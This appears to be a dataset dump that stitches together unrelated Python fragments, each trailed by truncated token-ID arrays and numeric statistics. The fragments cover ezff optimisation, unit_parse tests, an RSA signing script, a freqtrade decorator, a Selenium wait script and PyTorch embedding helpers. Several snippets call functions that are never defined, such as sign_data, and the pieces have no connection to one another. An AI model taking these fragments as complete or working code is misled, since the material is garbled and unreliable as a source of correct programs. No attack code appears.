problem = ezff.OptProblem(num_errors=1, variable_bounds=bounds,
                          error_function=my_error_function, template=template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population=16)
ezff.optimize(problem, algorithm, iterations=5)
[ 11748, 304, 89, 487, 198, 6738, 304, 89, 487, 13, 3849, 32186, 1330, 308, 29528, 11, 10662, 15245, 198, 198, 2, 2896, 500, 2323, 24279, 198, 13655, 62, 14542, 796, 10662, 15245, 13, 961, 62, 301, 5620, 10786, 2833, 62, 35310, 82, 14...
2.873016
252
import logging

from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *

test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)

test_split_list = [
    # positive control (changes)
    [["fish", "pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
    [["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
    [["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
    [["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],

    # negative control (no changes)
    [["fish"], ["fish"], {"chunks": ["fish"]}],
    [["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
    [[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)

test_round_off = [  # [Input, Output]
    # positive control (works)
    [234.2342300000001, 234.23423, {"sig_digit": 15}],
    [234.2342399999999999, 234.23424, {"sig_digit": 15}],
    [234.2342300000001, 234.23, {"sig_digit": 5}],
    [234.2342399999999999, 234.23, {"sig_digit": 5}],
    [234.2342399999999999, 200, {"sig_digit": 1}],
    [-234.2342399999999999, -200, {"sig_digit": 1}],
    [-234.2342399999999999, -234.23424, {"sig_digit": 15}],

    # negative control (fails)
]
testing_func(sig_figs, test_round_off)

test_list_depth = [  # [Input, Output]
    # positive control (works)
    ["", 0],
    [[], 0],
    ["asds", 0],
    [1, 0],
    [["aaa"], 1],
    [[["aaa"]], 2],
    [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
    [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
    [[[["aaa"], ["aaa"], ["aaa"]]], 3],

    # negative control (fails)
]
testing_func(get_list_depth, test_list_depth)

test_remove_empty_cells = [  # [Input, Output]
    # positive control (works)
    [[], None],
    [[""], None],
    [["asds"], ["asds"]],
    [1, 1],
    [["aaa", ""], ["aaa"]],
    [["aaa", []], ["aaa"]],
    [[["aaa", []]], [["aaa"]]],
    [[["aaa", [""]]], [["aaa"]]],

    # negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)

examples_quantity_difference = [
    [Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
    [5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
[ 11748, 18931, 198, 198, 6738, 4856, 62, 20786, 1330, 4856, 62, 20786, 11, 1332, 62, 6404, 1362, 198, 6738, 4326, 62, 29572, 1330, 49706, 11, 11801, 11, 1195, 198, 6738, 4326, 62, 29572, 13, 26791, 1330, 1635, 198, 198, 9288, 62, 6404,...
2.297189
996
import sys

from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA


if __name__ == '__main__':
    key_file = sys.argv[1]
    input_string = sys.argv[2]
    out_file = sys.argv[3]

    sign_data(key_file, input_string, out_file)
[ 11748, 25064, 198, 198, 6738, 36579, 13, 11712, 1300, 1330, 279, 74, 6359, 16, 62, 1314, 198, 6738, 36579, 13, 26257, 1330, 25630, 11645, 198, 6738, 36579, 13, 15202, 9218, 1330, 42319, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, ...
2.509091
110
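`sign_data` is not defined in this row; a minimal sketch matching the call site, using the imported PyCryptodome primitives. Writing the raw PKCS#1 v1.5 signature bytes is an assumption about the intended output format:

def sign_data(key_file, input_string, out_file):
    # Load the RSA private key, hash the message, write the signature.
    with open(key_file, 'rb') as f:
        key = RSA.import_key(f.read())
    digest = SHA256.new(input_string.encode('utf-8'))
    signature = pkcs1_15.new(key).sign(digest)
    with open(out_file, 'wb') as f:
        f.write(signature)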
from typing import Any, Callable, NamedTuple, Optional, Union

from pandas import DataFrame

from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair

PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]


class InformativeData(NamedTuple):
    asset: Optional[str]
    timeframe: str
    fmt: Optional[Union[str, Callable[[Any], str]]]
    ffill: bool


def informative(timeframe: str, asset: str = '',
                fmt: Optional[Union[str, Callable[[Any], str]]] = None,
                ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
    """
    A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
    define informative indicators.

    Example usage:

        @informative('1h')
        def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
            dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
            return dataframe

    :param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
    :param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
                  current pair.
    :param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)).
                When not specified, defaults to:
                * {base}_{quote}_{column}_{timeframe} if asset is specified.
                * {column}_{timeframe} if asset is not specified.
                Format string supports these format variables:
                * {asset} - full name of the asset, for example 'BTC/USDT'.
                * {base} - base currency in lower case, for example 'eth'.
                * {BASE} - same as {base}, except in upper case.
                * {quote} - quote currency in lower case, for example 'usdt'.
                * {QUOTE} - same as {quote}, except in upper case.
                * {column} - name of dataframe column.
                * {timeframe} - timeframe of informative dataframe.
    :param ffill: ffill dataframe after merging informative pair.
    """
    _asset = asset
    _timeframe = timeframe
    _fmt = fmt
    _ffill = ffill

    # Minimal inner decorator (reconstructed): it records the informative
    # request on the wrapped function so the strategy loader can pick it up.
    def decorator(fn: PopulateIndicators) -> PopulateIndicators:
        informative_pairs = getattr(fn, '_ft_informative', [])
        informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
        setattr(fn, '_ft_informative', informative_pairs)
        return fn

    return decorator
[ 6738, 19720, 1330, 4377, 11, 4889, 540, 11, 34441, 51, 29291, 11, 32233, 11, 4479, 198, 198, 6738, 19798, 292, 1330, 6060, 19778, 198, 198, 6738, 2030, 80, 25351, 13, 1069, 11755, 1330, 6564, 864, 16922, 198, 6738, 2030, 80, 25351, 13...
2.960843
664
from functools import partial

from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
    WebDriverWait
)


# Helper elided in this row: truthy once the CSS selector matches something,
# so it can serve as a WebDriverWait condition.
def esperar_elemento(seletor, navegador):
    return navegador.find_elements_by_css_selector(seletor)


esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')

url = 'https://selenium.dunossauro.live/aula_09_a.html'

driver = Firefox()

wdw = WebDriverWait(driver, 10)

driver.get(url)

wdw.until(esperar_botao, 'Deu ruim')

driver.find_element_by_css_selector('button').click()

wdw.until(
    esperar_sucesso,
    'A mensagem de sucesso não apareceu'
)

sucesso = driver.find_element_by_css_selector('#finished')

assert sucesso.text == 'Carregamento concluído'
[ 6738, 1257, 310, 10141, 1330, 13027, 198, 6738, 384, 11925, 1505, 13, 12384, 26230, 1330, 16802, 198, 6738, 384, 11925, 1505, 13, 12384, 26230, 13, 11284, 13, 9019, 1330, 357, 198, 220, 220, 220, 5313, 32103, 21321, 198, 8, 628, 198, ...
2.501931
259
import torch
from torch import nn

from prae.distances import square_dist, HingedSquaredEuclidean


def tile(embedding, example):
    """
    Tile an embedding so it lines up with a batch of examples: each of the
    b embeddings is repeated n = len(example) // b times.
    """
    n = example.shape[0] // embedding.shape[0]
    embedding = embedding.unsqueeze(1).repeat(1, n, 1)
    embedding = squeeze_embedding(embedding)
    return embedding


def squeeze_embedding(x):
    """
    Flatten a b x n x d embedding tensor to (b*n) x d.
    """
    b, n, d = x.shape
    x = x.reshape(b * n, d)
    return x
[ 11748, 28034, 198, 6738, 28034, 1330, 299, 77, 198, 6738, 7201, 68, 13, 17080, 1817, 1330, 6616, 62, 17080, 11, 367, 24431, 22266, 1144, 36, 36616, 485, 272, 628, 628, 198, 4299, 17763, 7, 20521, 12083, 11, 1672, 2599, 198, 220, 220, ...
2.416185
173
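A quick shape check for the two helpers above, run in the same module:

import torch

embedding = torch.randn(2, 8)  # b x d
example = torch.randn(6, 8)    # (b*n) x d, so n = 3
tiled = tile(embedding, example)
print(tiled.shape)             # torch.Size([6, 8]): one row per example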